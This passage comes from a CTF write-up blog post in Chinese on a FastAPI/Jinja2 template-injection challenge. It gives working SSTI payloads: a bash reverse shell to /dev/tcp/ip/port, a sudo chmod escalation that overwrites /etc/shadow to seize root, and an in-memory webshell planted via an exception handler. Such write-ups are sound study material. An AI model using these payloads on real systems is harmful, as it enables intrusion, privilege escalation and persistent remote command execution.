class="meta">@app.get(<span class="params"><span class="string">&quot;/shellMe&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">shellMe</span>(<span class="params">username=<span class="string">&quot;Guest&quot;</span></span>):</span><br><span class="line">    Jinja2.from_string(<span class="string">&quot;Welcome &quot;</span> + username).render()</span><br><span class="line">    <span class="keyword">return</span> HTMLResponse(content=<span class="string">&quot;&lt;h1&gt;Welcome!&lt;/h1&gt;&lt;p&gt;Request processed.&lt;/p&gt;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">method_disabled</span>(<span class="params">*args, **kwargs</span>):</span><br><span class="line">    <span class="keyword">raise</span> NotImplementedError(<span class="string">&quot;此路不通！该方法已被管理员禁用。&quot;</span>)</span><br><span class="line"></span><br><span class="line">app.add_api_route = method_disabled</span><br><span class="line">app.add_middleware = method_disabled</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line"></span><br><span class="line">    uvicorn.run(app, host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">8000</span>)</span><br></pre></td></tr></table></figure>

<p>由于没回显，本地调成有回显的方便找东西，最后exp：</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/shellMe?username=&#123;self.<span class="built_in">_</span><span class="built_in">_</span>dict<span class="built_in">_</span><span class="built_in">_</span>.<span class="built_in">_</span>TemplateReference<span class="built_in">_</span><span class="built_in">_</span>context.keys()&#125;先用这个看下有哪些内置的东西可以使用</span><br><span class="line">用bash -c &quot;bash -i &gt;<span class="built_in">&amp;</span>/dev/tcp/ip/port 0&gt;<span class="built_in">&amp;</span>1&quot;去弹shell</span><br><span class="line">/shellMe?username=&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>.os.popen(&#x27;bash -c &quot;bash -i &gt;<span class="built_in">&amp;</span>/dev/tcp/ip/port 0&gt;<span class="built_in">&amp;</span>1&quot;&#x27;).read()&#125;注意url编码一下就好了</span><br></pre></td></tr></table></figure>

<p>哈哈拿到shell之后flag就在跟目录下，但是没有权限！先看下能不能suid提权，但是没有好的suid提权命令！</p>
<p>sudo 提权</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sudo -l发现可以用chmod命令提权，这是一个设置文件权限的命令，对于这道题来说我们只需要</span><br><span class="line">chmod 764 /flag 就可以直接读了</span><br><span class="line">拿下整台机子</span><br><span class="line">chmod 766 /etc/shadow</span><br><span class="line">echo &#x27;root:<span class="built_in">$</span>1<span class="built_in">$</span>flag<span class="built_in">$</span>Qiv1fGuuojJhoMNhwWehP.:18000:0:99999:7:::&#x27; &gt; /etc/shadow</span><br><span class="line">然后su root（密码就是我们改的root）这样就拿下了</span><br></pre></td></tr></table></figure>

<p><img src="/images/achieve/2025/11/6.png"></p>
<h3 id="预期-1"><a href="#预期-1" class="headerlink" title="预期"></a>预期</h3><p>那么说到非预期是出网打反弹shell，那么预期自然就是不出网打内存马呗！</p>
<p>这里就不是flask框架下的内存马了，是FaskAPI框架！参考：<a target="_blank" rel="noopener" href="https://www.caterpie771.cn/archives/333#%E7%BB%8F%E5%85%B8%E8%B7%AF%E7%BA%BF%EF%BC%9A%E6%89%93%E8%B7%AF%E7%94%B1%E6%B7%BB%E5%8A%A0%E5%87%BD%E6%95%B0">FastAPI 内存马的研究 - caterpie的小站</a></p>
<ol>
<li>经典路线打路由添加函数</li>
<li>新路线的探究</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">app.add_api_route = method_disabled</span><br><span class="line">app.add_middleware = method_disabled</span><br></pre></td></tr></table></figure>

<p>只能打第二种了，这次当回脚本小子！感觉挺有意思的，打算后面研究一下</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/shellMe?username=&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;<span class="built_in">_</span><span class="built_in">_</span>builtins<span class="built_in">_</span><span class="built_in">_</span>&#x27;][&#x27;eval&#x27;](&quot;<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;<span class="built_in">_</span><span class="built_in">_</span>main<span class="built_in">_</span><span class="built_in">_</span>&#x27;].app.middleware<span class="built_in">_</span>stack.app.app.app.add<span class="built_in">_</span>exception<span class="built_in">_</span>handler(404,lambda request,exc:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;<span class="built_in">_</span><span class="built_in">_</span>main<span class="built_in">_</span><span class="built_in">_</span>&#x27;].app.<span class="built_in">_</span><span class="built_in">_</span>init<span class="built_in">_</span><span class="built_in">_</span>.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;JSONResponse&#x27;](content=&#123;&#x27;message&#x27;:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;os&#x27;).popen(request.query<span class="built_in">_</span>params.get(&#x27;cmd&#x27;) or &#x27;whoami&#x27;).read()&#125;))&quot;)&#125;</span><br></pre></td></tr></table></figure>

<p>这个payload我在本地打通了，放到远程就打不通了！后面一步一步fuzz，发现是中间件的问题，就一个app</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/shellMe?username=&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;<span class="built_in">_</span><span class="built_in">_</span>builtins<span class="built_in">_</span><span class="built_in">_</span>&#x27;][&#x27;eval&#x27;](&quot;<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;<span class="built_in">_</span><span class="built_in">_</span>main<span class="built_in">_</span><span class="built_in">_</span>&#x27;].app.middleware<span class="built_in">_</span>stack.app.add<span class="built_in">_</span>exception<span class="built_in">_</span>handler(404,lambda request,exc:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;<span class="built_in">_</span><span class="built_in">_</span>main<span class="built_in">_</span><span class="built_in">_</span>&#x27;].app.<span class="built_in">_</span><span class="built_in">_</span>init<span class="built_in">_</span><span class="built_in">_</span>.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;JSONResponse&#x27;](content=&#123;&#x27;message&#x27;:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;os&#x27;).popen(request.query<span class="built_in">_</span>params.get(&#x27;cmd&#x27;) or &#x27;whoami&#x27;).read()&#125;))&quot;)&#125;</span><br></pre></td></tr></table></figure>

<p>byd还是打不通，还是一步步测试，发现题目<code>sys.modules[&#39;__main__&#39;]</code>下面没有app，真奇怪，难道是bao师傅把它删了？后面BR师傅说是在app模块压根就不在main模块，但是本地为什么可以呢？</p>
<p>附件里面还有个start.sh被我忽略了</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec uvicorn app:app --host 0.0.0.0 --port 8000</span><br></pre></td></tr></table></figure>

<p><code>uvicorn</code>用于启动 Uvicorn ASGI 服务器，<code>app:app</code>格式是<code>module_name:variable_name</code></p>
<p>所以本质上它是通过这个起的服务，我本地就是运行python脚本起的服务自然不一样</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/shellMe?username=&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;<span class="built_in">_</span><span class="built_in">_</span>builtins<span class="built_in">_</span><span class="built_in">_</span>&#x27;][&#x27;eval&#x27;](&quot;<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;app&#x27;].app.middleware<span class="built_in">_</span>stack.app.add<span class="built_in">_</span>exception<span class="built_in">_</span>handler(404,lambda request,exc:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;sys&#x27;).modules[&#x27;app&#x27;].app.<span class="built_in">_</span><span class="built_in">_</span>init<span class="built_in">_</span><span class="built_in">_</span>.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;JSONResponse&#x27;](content=&#123;&#x27;message&#x27;:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;os&#x27;).popen(request.query<span class="built_in">_</span>params.get(&#x27;cmd&#x27;) or &#x27;whoami&#x27;).read()&#125;))&quot;)&#125;</span><br></pre></td></tr></table></figure>

<p>这样就打通了</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这道题还是很不错的，增加了我对ssti，反弹shell，linux提权，内存马的理解！</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0me</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/archives/">artic1es</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%94%A6%E5%AE%B6%E6%9C%89%E4%BB%80%E4%B9%88"><span class="toc-number">1.</span> <span class="toc-text">锦家有什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-include"><span class="toc-number">2.</span> <span class="toc-text">ez_include</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#normal-php"><span class="toc-number">3.</span> <span class="toc-text">normal_php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%BC%E8%A7%81%E4%B8%8D%E4%B8%80%E5%AE%9A%E4%B8%BA%E5%AE%9E"><span class="toc-number">4.</span> <span class="toc-text">眼见不一定为实</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-file"><span class="toc-number">5.</span> <span class="toc-text">ez_file</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-include-revenge"><span class="toc-number">6.</span> <span class="toc-text">ez_include_revenge</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F"><span class="toc-number">6.1.</span> <span class="toc-text">非预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F"><span class="toc-number">6.2.</span> <span class="toc-text">预期</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-fastapi"><span class="toc-number">7.</span> <span class="toc-text">ez_fastapi</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F-1"><span class="toc-number">7.1.</span> <span class="toc-text">非预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F-1"><span class="toc-number">7.2.</span> <span class="toc-text">预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">7.3.</span> <span class="toc-text">总结</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&text=成都大学第八届玄武杯（ak）"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&is_video=false&description=成都大学第八届玄武杯（ak）"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=成都大学第八届玄武杯（ak）&body=Check out this article: https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&name=成都大学第八届玄武杯（ak）&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&t=成都大学第八届玄武杯（ak）"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    Rufeii
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <li><a href="/">h0me</a></li><li><a href="/about/">ab0ut</a></li><li><a href="/archives/">artic1es</a></li><li><a href="/tags/">tags</a></li><li><a href="/links/">links</a></li><li><a href="/search/">Search</a></li>
      </ul>
      <ul>
            
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
              
            
      </ul>
    </nav>
  </div>
</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>
